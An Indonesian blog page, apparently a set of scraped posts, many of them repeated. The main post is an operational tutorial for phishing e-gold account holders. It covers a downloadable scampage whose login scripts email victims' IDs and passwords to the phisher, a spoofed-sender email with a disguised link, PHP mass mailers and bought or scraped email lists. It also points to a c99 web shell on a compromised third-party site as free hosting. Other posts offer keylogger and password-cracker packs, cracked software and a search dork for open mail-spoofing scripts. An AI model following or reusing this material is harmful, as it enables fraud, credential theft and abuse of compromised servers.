Banyak orang di luar sana yang menggunakan istilah demikian, cpanel, host, php shell atau apalah. Intinya yang kita butuhkan adalah sebuah web hosting dengan dukungan php. Beruntunglah bagi anda yang sering bermain-main dengan php shell, atau mungkin mengutak-atik web sendiri. Karena anda tidak perlu bersusah payah untuk menempatkan situs e-gold anda nantinya atau bila masih kesulitan, setidaknya tahu bagaimana cara mendapatkannya. Namun, jika anda yang masih kesulitan dan belum mengerti bagaimana untuk mendapatkan web hosting sebagai tempat situs e-gold palsu, sepertinya anda harus sedikit bekerja keras untuk mendapatkannya, bisa meminta, berusaha mencari sendiri, atau bagaimanalah. Tapi yang jelas, saya tidak akan memberitahu caranya secara detail di sini, karena sudah banyak situs-situs berbahasa indonesia yang menyediakan cara untuk mendapatkan php shell, cpanel dsb. Atau, anda bisa juga menggunakan CC (Credit Card) untuk memesan web host secara online. Atau cara lain ? Silahkan berfantasi dengan kreativitas anda. Dan jangan lupa, yang terpenting adalah mendukung PHP dan bisa digunakan untuk mengirim e-mail.
Nah, untuk menjebak korban masuk ke dalam lubang jebakan sudah dimulai. Lubang jebakannya sudah disiapkan, lalu ?
- E-gold scampage
Agar korban mau masuk ke dalam lubang jebakan yang kita buat, kita harus membuat lubang jebakan tersebut tidak terlihat seperti lubang jebakan, namun terlihat biasa saja. Kira-kira seperti itulah fungsi scampage ini, dan menurut pendapat pribadi scampage adalah duplikat dari situs asli dan mengedit beberapa bagian sesuai kebutuhan/penipuan atau simple-nya duplikasi situs untuk menipu. Scampage ini merupakan scampage bikinan saya sendiri (*makanya jelek), yang merupakan komposisi dari, situs asli www.e-gold.com, dan menggunakan beberapa campuran script dari scampage yang dibuat oleh phiser lain, namun tidak di-update sehingga tampilannya tidak lagi terlihat seperti situs asli.
Download e-gold scampage di :
http://geocities.com/th3sn0wbr4in/egoldscampage.zip
Setelah anda men-download egoldscampage.zip ke komputer anda, extract file egoldscampage.zip dan edit file login.php dan login1.php yang terletak di folder www.egold.comacct.
Pada bagian $to = "your@e-mail.com"; ganti your@e-mail.com dengan e-mail anda yang nanti akan digunakan untuk menampung accountID + password e-gold dari korban-korban anda. Begitu juga pada file login1.php, ganti your@e-mail.com dengan e-mail anda yang nanti akan digunakan untuk menampung e-mail + password si korban.
Simpan semua perubahan yang sudah anda lakukan, dan sekarang upload file egoldscampage.zip ke Web Hosting yang sudah anda siapkan sebelumnya dan extract file egoldscampage.zip di Web hosting anda.
- E-mail palsu
Anda memasuki zona terlarang!!! Lewat sini agar anda selamat - TTD, Warga Sekitar. Kira-kira seperti itulah papan yang terpampang ketika anda sedang melewati daerah asing. Orang yang belum mengenal betul daerah tersebut, pasti akan mengikuti petunjuk jalan yang diberikan, apalagi ada tanda bahwa informasi ini berasal dari orang sekitar. Bagi yang panik, tentu mereka tidak lagi berpikir panjang dan langsung mengikuti petunjuk yang ada, sehingga mereka terjebak ke dalam lubang yang kita buat.
Kurang lebih, begitulah fungsi si 'e-mail palsu'. Berikut ini adalah dua buah e-mail palsu yang mungkin bisa anda gunakan.
http://geocities.com/th3sn0wbr4in/gold-letter-1.txt
http://geocities.com/th3sn0wbr4in/gold-letter-2.txt
Untuk gold-letter-1.txt, ada bagian yang harus anda ubah sebelum e-mail tersebut dikirimkan ke korban.
Please update your records on or before October 5th, 2007.
Ganti October 5th, 2007 dengan tanggal 3-5 hari kemudian ketika anda mengirimkan e-mail palsu. Misalnya, anda mengirim e-mail tersebut pada tanggal 1 October 2007, anda ganti menjadi 3-5 hari ke depan sebagai tenggang waktu untuk sang korban.
Pada gold-letter tersebut, ada 4 bagian yaitu : From, Name, Subject, dan Message. Keempat-nya ini akan digunakan pada Inbox Mailer nanti. Jika anda ingin melihat preview e-mail tersebut, copy-paste Message dari letter tersebut ke notepad, dan save sebagai file html. Di setiap e-mail tersebut, terdapat sebuah link yang akan mengarahkan korban ke situs e-gold milik anda.
Contoh pada gold-letter-1.txt, jika anda melihat preview dari e-mail tersebut, isinya adalah demikian :
To update your E-gold records click on the following link:
https://www.e-gold.com/acct/login.html
Namun, bila anda melihat html code-nya, isinya adalah demikian :
To update your E-gold records click on the following link:
https://www.e-gold.com/acct/login.html
Jadi, link https://www.e-gold.com/acct/login.html sebenarnya mengarah ke http://www.modelbc.de/administrator/modules/www.e-gold.com/acct/login.html yang merupakan 'lubang jebakan' milik th3sn0wbr4in. Ganti http://www.modelbc.de/administrator/modules/www.e-gold.com/acct/login.html dengan alamat situs e-gold milik anda sendiri yang sudah anda persiapkan.
Berikut ini, contoh e-mail gold-letter-1 di inbox yahoo milik saya
http://i189.photobucket.com/albums/z55/ianis01/contentmailno4.png
- PHP Inbox Mass Mailer
Sayangnya, kedua gold-letter tersebut barulah desain. Selama e-mail tersebut masih berada di komputer lokal, tidak ada korban yang bisa melihatnya sehingga tidak satupun terjebak masuk ke dalam jebakan yang sudah anda siapkan. Agar 'para korban' melihat e-mail tersebut, anda harus mengirimkan e-mail ke korban.
Dan bila anda ingin korban anda 'melihat' e-mail tersebut, e-mail anda harus tiba di Inbox sang korban, bukan Bulk, Spam, Junk atau istilah lainnya, karena jarang korban yang mau melihat e-mail yang tiba di kategori-kategori tersebut (Bulk, Spam, Junk, etc) walaupun memang ada, tapi tidak banyak.
Karena itu, anda harus menggunakan PHP Inbox Mass Mailer, merupakan sebuah script PHP yang digunakan untuk mengirimkan e-mail secara massal ke korban.
Contoh tampilannya adalah sebagai berikut :
http://i189.photobucket.com/albums/z55/ianis01/mailergl3.png
Isi field Your Email, Your Name, Subject, dan Message seperti yang tertera pada gold-letter-1 atau gold-letter-2, tapi isi dengan gold-letter yang sudah anda edit.
Script php inbox mass mailer :
http://geocities.com/th3sn0wbr4in/mailer.txt
http://geocities.com/th3sn0wbr4in/mailer.arif.txt
Untuk script mailer.arif.txt, didapat dari teman yang original link-nya adalah
http://geocities.com/aliif_1604/run.txt
Agar anda bisa menggunakan PHP Inbox Mass Mailer, anda harus meng-upload-nya ke Web Hosting yang mendukung PHP dan mengirim mail. Sekarang bagaimana caranya agar e-mail tersebut masuk inbox, itu tergantung pada Web Hosting tempat anda meng-upload script mailer-nya. Tidak semua host yang bisa mengirim mail tapi tiba di inbox. Apalagi, kita menggunakan AccountRobot_donotreply@e-gold.com sebagai e-mail pengirim. Bagaimana caranya mengetahui apakah host bisa mengirim e-mail dan tiba di inbox ? Cukup upload script mailer, dan coba anda kirim ke e-mail anda sendiri. Apabila anda mendapatkan e-mail palsu anda tiba di inbox, berarti host tersebut layak digunakan untuk mengirim e-mail e-mail palsu ke korban. Pengalaman pribadi saya sendiri, bagian inilah yang paling sulit. Sejak beberapa tahun yang lalu saya sudah menyiapkan semua yang saya butuhkan untuk membuat jebakan ini, tapi selalu terhenti karena belum juga mendapatkan host yang layak untuk mengirimkan e-mail palsu ke korban. Awalnya saya pikir tidak mungkin mendapatkan host yang bisa mengubah alamat pengirim menjadi seperti AccountRobot_donotreply@e-gold.com. Tapi pada akhir tahun 2006, seorang teman yang memiliki Yahoo! ID tommyhacku memberikan saya sebuah host yang bisa melakukannya.
Jadi, selamat berjuang untuk mendapatkannya. Bila anda sudah mendapatkannya, saat-nya mengumpulkan daftar korban.
- E-mail list
Tentukan siapa korbanmu!!! Bagaimana mengetahui e-mail orang yang memiliki e-gold account?
- Cari dari forum-forum yang berbicara soal e-gold, paypal, atau business
- Cari dari situs-situs HYIP
Tapi sepertinya yang demikian itu cukup sulit. Jadi, kita tidak perlu e-mail yang mana yang mempunyai e-gold account. Masukkan saja semua daftar e-mail ke dalam field target di PHP Mailer. Beberapa cara yang bisa didapatkan untuk mendapatkan e-mail list :
- Beli lewat situs-situs yang menjualnya menggunakan CC. Anda bisa menggunakan keyword "buy e-mail leads" atau keyword lainnya lewat google. Silahkan dicoba-coba keyword lainnya.
- Menggunakan software e-mail extractor
Salah satu software yang terkenal untuk mengumpulkan e-mail adalah Tarantula.
Download software-nya di http://www.emailsmartz.com/downloads/tarantula.exe
Download Patch Tarantula di http://www.geocities.com/toemenggoeng/error/Patch-Tarantula-SG.zip
Jangan tanya saya untuk menggunakannya. Silahkan coba-coba sendiri
- Action!!!
Setelah semua siap, silahkan kirim e-mail palsu ke daftar korban lewat php mailer anda dan tunggu hasilnya di e-mail anda.
Secara simple, yang dibutuhkan adalah :
- Host, yang belum punya boleh nyoba http://modelbc.de/administrator/modules/index_page.php (c99 shell)
- Scampage, source : http://geocities.com/th3sn0wbr4in/egoldscampage.zip
- Mailer + Host utk Mailer, source : http://geocities.com/th3sn0wbr4in/mailer.txt
- Mail list
Menyewa film DVD tanpa harus repot mengembalikan lagi
Mungkin banyak yang tidak suka untuk menyewa DVD di toko penyewaan (DVD Rental store) karena repot apabila harus mengembalikannya kembali ke toko tersebut dan kadang membuat sedikit jengkel karena DVD yang kita cari sedang disewa orang lain.
Sebuah perusahaan bernama PortoMedia di Irlandia menemukan solusi terbaik untuk masalah ini.
Mereka membangun sebuah kios rental DVD yang menggunakan mesin layaknya sebuah ATM.
Untuk menyewa film favorit anda, cukup membawa USB Flash atau hardisk portable, download dan nonton.
Tentu saja anda harus membayar layaknya anda menyewa DVD di toko penyewaan DVD.
Tapi dengan cara ini, ada beberapa keuntungan yaitu anda tidak perlu takut bahwa DVD yang anda cari sedang disewa orang lain dan anda tidak perlu repot untuk mengembalikannya.
Dengan sistim proteksi, film yang sudah di download tidak dapat diputar kembali setelah beberapa waktu.
Sebuah perusahaan bernama PortoMedia di Irlandia menemukan solusi terbaik untuk masalah ini.
Mereka membangun sebuah kios rental DVD yang menggunakan mesin layaknya sebuah ATM.
Untuk menyewa film favorit anda, cukup membawa USB Flash atau hardisk portable, download dan nonton.
Tentu saja anda harus membayar layaknya anda menyewa DVD di toko penyewaan DVD.
Tapi dengan cara ini, ada beberapa keuntungan yaitu anda tidak perlu takut bahwa DVD yang anda cari sedang disewa orang lain dan anda tidak perlu repot untuk mengembalikannya.
Dengan sistim proteksi, film yang sudah di download tidak dapat diputar kembali setelah beberapa waktu.
Invisible Secrets + With Crack
Keep those prying eyes out of your communications and prevent unwanted people from reading your private files!
Invisible Secrets 4 not only encrypts your data and files for safe keeping or for secure transfer across the net, it also hides them in places that on the surface appear totally innocent, such as picture or sound files, or web pages. These types of files are a perfect disguise for sensitive information. Using our file encryption software nobody, not even your wife, boss, or a hacker would realize that your important papers or letters are stored in your last holiday pictures, or that you use your personal web page to exchange messages or secret documents. With Invisible Secrets 4 - file encryption software you may encrypt and hide files directly from Windows Explorer, and then automatically transfer them by e-mail or via the Internet.
It features strong file encryption algorithms (including AES - Rijndael), a password management solution that stores all your passwords securely and helps you create secure passwords, a shredder that helps you destroy beyond recovery files, folders and internet traces, a locker that allows you to password protect certain applications, the ability to create self-decrypting packages and mail them to your friends or business partners, a tool that allows you to transfer a password securely over the internet, and a cryptboard to help you use the program from Windows Explorer. Invisible Secrets 4 - File encryption software is shell integrated and offers a wizard that guides you through all the necessary steps needed to protect your data.
Cryptography:
File and folder encryption using 8 strong encryption algorithms (AES - Rijndael, Twofish, RC 4, Cast128, GOST, Diamond 2, Sapphire II, Blowfish).
Steganography:
Hides your sensitive data into innocent files, so nobody can find them. Features five innocent carriers for hiding: JPEG, PNG, BMP, HTML and WAV.
Email Encryption:
Possibility to create a package with encrypted content and to send it by e-mail.
Password manager - Random password generator
With Invisible Secrets 4 you can store passwords in encrypted password lists and you can also generate real-random passwords.
File Shredder:
An integrated Shredder (DoD 5220.22-M compliant) to destroy files and folders beyond recovery.
Application Locker:
An Application Locker to password protect any application installed on your computer.
IP-to-IP Password Transfer
Allows the secure transfer of passwords between two computers using an encrypted internet line.
Virtual Keyboard:
The virtual keyboard was created in order to prevent any key logger software from stealing your passwords.
Cryptboard:
A Shell Integrated Cryptboard - use it like a basket for storing file names and make various operations on them in a single step
Real-time News System
It will allow you to be kept up-to-date with new versions, new products, new features, and special offers, without having to browse our website
searching for new information. You will instantly get the news from us.
You Can Download Here
Aneka Software Hacking
Sebenarnya ada banyak sekali software hacking yang saya punya. Tapi sebagian besar filenya berukuran besar. Jadi uploadnya sedikit demi sedikit saja. Ini ada
beberapa yang mungkin bisa berguna bagi yang suka nyoba hacking-hackingan. Lain kali kalau koneksinya lebih baik, akan saya saya upload lagi. Hari ini koneksi internet sedang buruk sekali dan sangat lambat. Jadinya hanya bisa upload sedikit. Harap maklum....
Bagi teman-teman yang punya software dan mau berbagi link download silakan posting saja url Anda di bagian komentar.
Silakan download software-software hacking berikut ini:
Paket Software Hacking
Paket Software Hacking 2
Paket Software Hacking 3
Paket Software Keylogger
Tools IP address
Paket Software Hacking 4
Pembobol Password 1
Pembobol Password 2
Paket Software Hacking 5
Paket Software Hacking 6
Selamat mendownload...Lain kali saya berikan software-software yang lainnya.
beberapa yang mungkin bisa berguna bagi yang suka nyoba hacking-hackingan. Lain kali kalau koneksinya lebih baik, akan saya saya upload lagi. Hari ini koneksi internet sedang buruk sekali dan sangat lambat. Jadinya hanya bisa upload sedikit. Harap maklum....
Bagi teman-teman yang punya software dan mau berbagi link download silakan posting saja url Anda di bagian komentar.
Silakan download software-software hacking berikut ini:
Paket Software Hacking
Paket Software Hacking 2
Paket Software Hacking 3
Paket Software Keylogger
Tools IP address
Paket Software Hacking 4
Pembobol Password 1
Pembobol Password 2
Paket Software Hacking 5
Paket Software Hacking 6
Selamat mendownload...Lain kali saya berikan software-software yang lainnya.
Akses internet bebas tanpa blokir
Saya pribadi mendukung UU ITE yang bertujuan untuk kemajuan bangsa dan rakyat Indonesia, terutama untuk mengangkat martabat bangsa Indonesia di dunia Internet.
Saya pribadi sangat tidak mendukung UU ITE jika digunakan sebagai alat untuk memeras atau sebagai alat pembodohan masyarakat oleh (ke/a)parat.
Adalah suatu tindakan yang sangat bodoh jika ingin membunuh tikus di dalam lumbung dengan cara membakar lumbung tersebut. Demikian juga jika memblok suatu situs hanya karena sebuah content yang kontroversial. blokirnya saat ini sudah dibuka kembali dan hanya diblokir URL-nya bukan seluruh situsnya
Informasi yang saya bagi disini hanyalah sebagai bahan pembelajaran. Harap digunakan secara baik dan bertanggung jawab.
Langsung saja ke pokok permasalahan, yaitu bagaimana caranya mengakses internet dengan bebas tanpa blokir. Ada banyak cara untuk memblokir suatu situs di internet, salah duanya yaitu:
1.Memblok pada DNS server sehingga nama domain tersebut tidak dikenal atau tidak bisa diakses sehingga selalu muncul tulisan “Looking for….” setelah beberapa lama akan muncul “Server not found”
2.Memblok content atau isi situs tersebut sehingga jika kita mengakses selalu keluar tulisan “Wating for….” sampe tua, tanpa keluar2 isi dari situs tersebut
Untuk mendapatkan akses internet bebas tanpa blokir jika ISP Anda hanya memblok melalui DNS Server-nya mudah saja. Pindahkan saja setting DNS Server di komputer Anda ke DNS Server lain, ke OpenDNS misalnya. Untuk petunjuk cara mengubah setting DNS Server Anda, silahkan lihat tulisan saya sebelumnya atau klik di sini.
Untuk mendapatkan akses internet bebas tanpa blokir jika ISP Anda memblok dengan cara ke-2 juga sebenarnya tidak susah juga. Rahasianya adalah dengan menggunakan akses VPN. Untuk account VPN Anda bisa dapatkan di sini, yang berlaku selama 30 hari sejak pemakaian pertama. Setelah mendapatkan username dan password, Anda harus membuat koneksi VPN-nya.
Berikut ini adalah langkah-langkah membuat koneksi VPN, diasumsikan bahwa Anda menggunakan Windows XP dan terkonek langsung ke Internet baik melalui Router atau langsung ke modem. Dan juga diasumsikan Anda tidak menggunakan proxy.
Cara membuat koneksi VPN dengan PPTP:
1. Klik ke “Control Panel” -> “Network Connection“
2. Pilih “Create new connection“
3. Klik “Next“
4. Pilih “Connect to the network at myworkplace” lalu klik “Next“
5. Pilih “Virtual private network connection” lalu klik “Next“
6. Pada kolom “Company name“, isikan “net2vpn” lalu klik “Next“
7. Pilih “Do not dial the initial connection” lalu klik “Next“
8. Pada kolom “Host name or IP address” isikan “shareus.net2vpn.com” lalu klik “Next“
9. Pilih “Add a shortcut to this connection to my desktop” lalu klik “Finish“
10. Masukkan username dan password yang telah Anda beli, lalu pilih “Save this username & password for the following users/my user” lalu klik “Properties“
11. Pilih tab “Security“
12. Pilih “Advance” lalu klik tombol “Settings“
13. Dari “Data encryption” menu, pilih “Optional encryption” lalu pilih “Allow these protocols” pilih “Challenge handshake authentication protocol(chap)” lalu tekan “OK“
14. Klik “OK“, lalu klik “Yes“
15. Jika Anda ingin berselancar bebas tanpa blokir, jalankan koneksi net2vpn sebelum mulai berselancar.
Cara membuat koneksi VPN dengan L2TP:
1. Klik ke “Control Panel” -> “Network Connection“
2. Pilih “Create new connection“
3. Klik “Next“
4. Pilih “Connect to the network at myworkplace” lalu klik “Next“
5. Pilih “Virtual private network connection” lalu klik “Next“
6. Pada kolom “Company name“, isikan “net2vpn” lalu klik “Next“
7. Pilih “Do not dial the initial connection” lalu klik “Next“
8. Pada kolom “Host name or IP address” isikan “shareus.net2vpn.com” lalu klik “Next“
9. Pilih “Add a shortcut to this connection to my desktop” lalu klik “Finish“
10. Masukkan username dan password yang telah Anda beli, lalu pilih “Save this username & password for the following users/my user” lalu klik “Properties“
11. Pilih tab “Security“
12. Pilih “Typical” dan pada kolom “Validate my identity as follow” pilih “Require secured password” lalu klik tombol “IPSec Settings“
13. Pilih “Use pre-shared key for authentication” lalu pada kolom “Key” isi dengan “8870680” lalu tekan “OK“
14. Sekarang klik tab “Networking” dan pada kolom “Type of VPN” pilih “L2TP IPSEC VPN” lalu tekan tombol “OK“
15. Jika Anda ingin berselancar bebas tanpa blokir, jalankan koneksi net2vpn sebelum mulai berselancar.
Apa beda koneksi L2TP dan PPTP ?
Saya sendiri kurang jelas, tapi sepertinya koneksi L2TP lebih secure karena menggunakan pre-shared key. Tapi ada beberapa provider internet di Indonesia yang tidak bisa menggunakan koneksi VPN dengan metode L2TP, karena mungkin diblok oleh mereka baik secara sengaja atau tidak sengaja.
Jadi lebih baik pakai L2TP atau PPTP ?
Disarankan menggunakan metode koneksi L2TP, tapi jika tidak berhasil yah mau tidak mau harus pakai koneksi PPTP.
Pakai proxy yang gratis kan juga bisa, kenapa repot2 pakai VPN ?
Memang pakai proxy gratisan juga bisa, tapi takutnya semua traffic data di log oleh adminnya. Sehingga sangat tidak aman jika Anda melakukan transaksi online atau jika Anda meng-input username dan password pada suatu situs. Lagi pula kan VPN ada kelebihannya, yaitu ter-enkripsi.
VPN gratisan juga ada ?
Ya, VPN gratisan juga ada. Jawabannya idem seperti diatas. Terserah Anda juga mau pakai yang gratis atau bayar. Toh saya hanya menyarankan saja. Tidak memaksa. Untuk VPN gratis silahkan lihat tulisan saya yang terbaru setelah tulisan ini. Atau klik disini.
Omong-omong VPN apaan sih ?
VPN atau Virtual Private Network adalah semacam “terowongan” yang aman (terenkripsi) yang menghubungkan koneksi dari komputer Anda ke server VPN. Tujuannya adalah agar data yang ditransfer /diterima tidak dapat dibaca oleh pihak ketiga. Orang lain tidak akan tahu dari mana Anda mengakses internet karena IP Address yang muncul nantinya adalah IP dari server VPN tersebut. Untuk lebih lengkapnya bisa dilihat di http://id.wikipedia.org/wiki/VPN.
Mau beli account net2vpn dimana ?
Bisa dibeli di GubraK.com dengan harga diskon Rp. 33.000,- untuk akses 30 hari yang dihitung dari pertama pemakaian atau bisa beli langsung juga ke net2vpn dengan harga US$ 5 untuk akses sama 30 hari.
Aduh, repot nih langkah2-nya! Boleh bantu settingin komputer saya ?
Boleh aja, selama Anda ada di Jakarta. Saya bisa bantu untuk setting komputer Anda dengan biaya tertentu tentunya. Tidak mahal2 kok, asal buat ganti ongkos bensin, keringat dan waktu saya aja. Silahkan hubungi saya dari menu di atas.
Mau coba sendiri tapi masih bingung nih ?
Tidak usah bingung2, silahkan hubungi lewat YM saya saja oke... broo..
Selamat mencoba !
WARNING! dengan menggunakan metode OPENDNS dan VPN maka akses internet Anda terbuka bebas termasuk bisa mengakses situs-situs pornografi yang nantinya akan diblok juga karena UU ITE. Oleh karena itu saya sarankan Anda untuk menggunakan software Filter Internet sendiri yang bisa didapatkan GRATIS pada situs-situs ini: Parental Control Bar, Naomi dan Chat Controller untuk mengatur aplikasi chatting.
Saya pribadi sangat tidak mendukung UU ITE jika digunakan sebagai alat untuk memeras atau sebagai alat pembodohan masyarakat oleh (ke/a)parat.
Adalah suatu tindakan yang sangat bodoh jika ingin membunuh tikus di dalam lumbung dengan cara membakar lumbung tersebut. Demikian juga jika memblok suatu situs hanya karena sebuah content yang kontroversial. blokirnya saat ini sudah dibuka kembali dan hanya diblokir URL-nya bukan seluruh situsnya
Informasi yang saya bagi disini hanyalah sebagai bahan pembelajaran. Harap digunakan secara baik dan bertanggung jawab.
Langsung saja ke pokok permasalahan, yaitu bagaimana caranya mengakses internet dengan bebas tanpa blokir. Ada banyak cara untuk memblokir suatu situs di internet, salah duanya yaitu:
1.Memblok pada DNS server sehingga nama domain tersebut tidak dikenal atau tidak bisa diakses sehingga selalu muncul tulisan “Looking for….” setelah beberapa lama akan muncul “Server not found”
2.Memblok content atau isi situs tersebut sehingga jika kita mengakses selalu keluar tulisan “Wating for….” sampe tua, tanpa keluar2 isi dari situs tersebut
Untuk mendapatkan akses internet bebas tanpa blokir jika ISP Anda hanya memblok melalui DNS Server-nya mudah saja. Pindahkan saja setting DNS Server di komputer Anda ke DNS Server lain, ke OpenDNS misalnya. Untuk petunjuk cara mengubah setting DNS Server Anda, silahkan lihat tulisan saya sebelumnya atau klik di sini.
Untuk mendapatkan akses internet bebas tanpa blokir jika ISP Anda memblok dengan cara ke-2 juga sebenarnya tidak susah juga. Rahasianya adalah dengan menggunakan akses VPN. Untuk account VPN Anda bisa dapatkan di sini, yang berlaku selama 30 hari sejak pemakaian pertama. Setelah mendapatkan username dan password, Anda harus membuat koneksi VPN-nya.
Berikut ini adalah langkah-langkah membuat koneksi VPN, diasumsikan bahwa Anda menggunakan Windows XP dan terkonek langsung ke Internet baik melalui Router atau langsung ke modem. Dan juga diasumsikan Anda tidak menggunakan proxy.
Cara membuat koneksi VPN dengan PPTP:
1. Klik ke “Control Panel” -> “Network Connection“
2. Pilih “Create new connection“
3. Klik “Next“
4. Pilih “Connect to the network at myworkplace” lalu klik “Next“
5. Pilih “Virtual private network connection” lalu klik “Next“
6. Pada kolom “Company name“, isikan “net2vpn” lalu klik “Next“
7. Pilih “Do not dial the initial connection” lalu klik “Next“
8. Pada kolom “Host name or IP address” isikan “shareus.net2vpn.com” lalu klik “Next“
9. Pilih “Add a shortcut to this connection to my desktop” lalu klik “Finish“
10. Masukkan username dan password yang telah Anda beli, lalu pilih “Save this username & password for the following users/my user” lalu klik “Properties“
11. Pilih tab “Security“
12. Pilih “Advance” lalu klik tombol “Settings“
13. Dari “Data encryption” menu, pilih “Optional encryption” lalu pilih “Allow these protocols” pilih “Challenge handshake authentication protocol(chap)” lalu tekan “OK“
14. Klik “OK“, lalu klik “Yes“
15. Jika Anda ingin berselancar bebas tanpa blokir, jalankan koneksi net2vpn sebelum mulai berselancar.
Cara membuat koneksi VPN dengan L2TP:
1. Klik ke “Control Panel” -> “Network Connection“
2. Pilih “Create new connection“
3. Klik “Next“
4. Pilih “Connect to the network at myworkplace” lalu klik “Next“
5. Pilih “Virtual private network connection” lalu klik “Next“
6. Pada kolom “Company name“, isikan “net2vpn” lalu klik “Next“
7. Pilih “Do not dial the initial connection” lalu klik “Next“
8. Pada kolom “Host name or IP address” isikan “shareus.net2vpn.com” lalu klik “Next“
9. Pilih “Add a shortcut to this connection to my desktop” lalu klik “Finish“
10. Masukkan username dan password yang telah Anda beli, lalu pilih “Save this username & password for the following users/my user” lalu klik “Properties“
11. Pilih tab “Security“
12. Pilih “Typical” dan pada kolom “Validate my identity as follow” pilih “Require secured password” lalu klik tombol “IPSec Settings“
13. Pilih “Use pre-shared key for authentication” lalu pada kolom “Key” isi dengan “8870680” lalu tekan “OK“
14. Sekarang klik tab “Networking” dan pada kolom “Type of VPN” pilih “L2TP IPSEC VPN” lalu tekan tombol “OK“
15. Jika Anda ingin berselancar bebas tanpa blokir, jalankan koneksi net2vpn sebelum mulai berselancar.
Apa beda koneksi L2TP dan PPTP ?
Saya sendiri kurang jelas, tapi sepertinya koneksi L2TP lebih secure karena menggunakan pre-shared key. Tapi ada beberapa provider internet di Indonesia yang tidak bisa menggunakan koneksi VPN dengan metode L2TP, karena mungkin diblok oleh mereka baik secara sengaja atau tidak sengaja.
Jadi lebih baik pakai L2TP atau PPTP ?
Disarankan menggunakan metode koneksi L2TP, tapi jika tidak berhasil yah mau tidak mau harus pakai koneksi PPTP.
Pakai proxy yang gratis kan juga bisa, kenapa repot2 pakai VPN ?
Memang pakai proxy gratisan juga bisa, tapi takutnya semua traffic data di log oleh adminnya. Sehingga sangat tidak aman jika Anda melakukan transaksi online atau jika Anda meng-input username dan password pada suatu situs. Lagi pula kan VPN ada kelebihannya, yaitu ter-enkripsi.
VPN gratisan juga ada ?
Ya, VPN gratisan juga ada. Jawabannya idem seperti diatas. Terserah Anda juga mau pakai yang gratis atau bayar. Toh saya hanya menyarankan saja. Tidak memaksa. Untuk VPN gratis silahkan lihat tulisan saya yang terbaru setelah tulisan ini. Atau klik disini.
Omong-omong VPN apaan sih ?
VPN atau Virtual Private Network adalah semacam “terowongan” yang aman (terenkripsi) yang menghubungkan koneksi dari komputer Anda ke server VPN. Tujuannya adalah agar data yang ditransfer /diterima tidak dapat dibaca oleh pihak ketiga. Orang lain tidak akan tahu dari mana Anda mengakses internet karena IP Address yang muncul nantinya adalah IP dari server VPN tersebut. Untuk lebih lengkapnya bisa dilihat di http://id.wikipedia.org/wiki/VPN.
Mau beli account net2vpn dimana ?
Bisa dibeli di GubraK.com dengan harga diskon Rp. 33.000,- untuk akses 30 hari yang dihitung dari pertama pemakaian atau bisa beli langsung juga ke net2vpn dengan harga US$ 5 untuk akses sama 30 hari.
Aduh, repot nih langkah2-nya! Boleh bantu settingin komputer saya ?
Boleh aja, selama Anda ada di Jakarta. Saya bisa bantu untuk setting komputer Anda dengan biaya tertentu tentunya. Tidak mahal2 kok, asal buat ganti ongkos bensin, keringat dan waktu saya aja. Silahkan hubungi saya dari menu di atas.
Mau coba sendiri tapi masih bingung nih ?
Tidak usah bingung2, silahkan hubungi lewat YM saya saja oke... broo..
Selamat mencoba !
WARNING! dengan menggunakan metode OPENDNS dan VPN maka akses internet Anda terbuka bebas termasuk bisa mengakses situs-situs pornografi yang nantinya akan diblok juga karena UU ITE. Oleh karena itu saya sarankan Anda untuk menggunakan software Filter Internet sendiri yang bisa didapatkan GRATIS pada situs-situs ini: Parental Control Bar, Naomi dan Chat Controller untuk mengatur aplikasi chatting.
Email setan
cara ngirim email palsu ke email orang, mayan ne bwat ngerjain orang
cari aja di google dengan keyword :
inurl:XcCDONTS.asp (ada salah satu yang masih aktif cari sendiri yeeee)
aku sudah buktiin sendiri bo’
hasilnya emang bener2 yahuut bgt
artikel ini bukan untuk 7an merusak ato neko2 tapi hanya untuk pengetahuan….Ok
try it’s
Selamat Berjuang
cari aja di google dengan keyword :
inurl:XcCDONTS.asp (ada salah satu yang masih aktif cari sendiri yeeee)
aku sudah buktiin sendiri bo’
hasilnya emang bener2 yahuut bgt
artikel ini bukan untuk 7an merusak ato neko2 tapi hanya untuk pengetahuan….Ok
try it’s
Selamat Berjuang
Do not only YouTube for video tutorial do not only you tube but…
Here are some useful links about Video Tutorial that I’ve found on the Internet. Actually, there are many kind of video in free video sharing sites like youtube. In Indonesia, there are several video sharing sites like Video Indonesia.sc and Layar Tancap.com
1. Warrior of the Net (How internet work Illustrated)
Educational material in form of animations and illustrations explaining technical or abstract concepts about how the Internet Work. You can download it from here (71,2 MB) or another links from the original site. This video is for no-commercial only.
2. Install Wordpress
from CNET Video and WordPress Video Tutorial Courtesy of OptiNiche (need high bandwidth)
3. Install Drupal
Video Tutorial Drupal (77 MB) by Komunitas Drupal Indonesia
4. WindowsXP on Mac (Intel)
Video tutorial of how to install WindowsXP on an Intel Mac (58,7 MB)
6. Flash
gotoAndLearn, Free flash tutorial focuses on using Adobe Flash.
7. Hacking
Here is my favorites links
Hacking Illustrated
HackingDefined
antichat.ru (translate it using google translate)
8. News
(ops.. it is not about tutorial, it is News and need high bandwidth)
Liputan 6 (Indonesia News from SCTV)
CNET TV or CNET News
CNN Video
Yahoo News Video
9. Youtube
And of course you can also download more tutorial from youtube using keyword ‘tutorial’.
about link you can visit direcly :
http://chaidir.wordpress.com/
1. Warrior of the Net (How internet work Illustrated)
Educational material in form of animations and illustrations explaining technical or abstract concepts about how the Internet Work. You can download it from here (71,2 MB) or another links from the original site. This video is for no-commercial only.
2. Install Wordpress
from CNET Video and WordPress Video Tutorial Courtesy of OptiNiche (need high bandwidth)
3. Install Drupal
Video Tutorial Drupal (77 MB) by Komunitas Drupal Indonesia
4. WindowsXP on Mac (Intel)
Video tutorial of how to install WindowsXP on an Intel Mac (58,7 MB)
6. Flash
gotoAndLearn, Free flash tutorial focuses on using Adobe Flash.
7. Hacking
Here is my favorites links
Hacking Illustrated
HackingDefined
antichat.ru (translate it using google translate)
8. News
(ops.. it is not about tutorial, it is News and need high bandwidth)
Liputan 6 (Indonesia News from SCTV)
CNET TV or CNET News
CNN Video
Yahoo News Video
9. Youtube
And of course you can also download more tutorial from youtube using keyword ‘tutorial’.
about link you can visit direcly :
http://chaidir.wordpress.com/
Subscribe to:
Posts (Atom)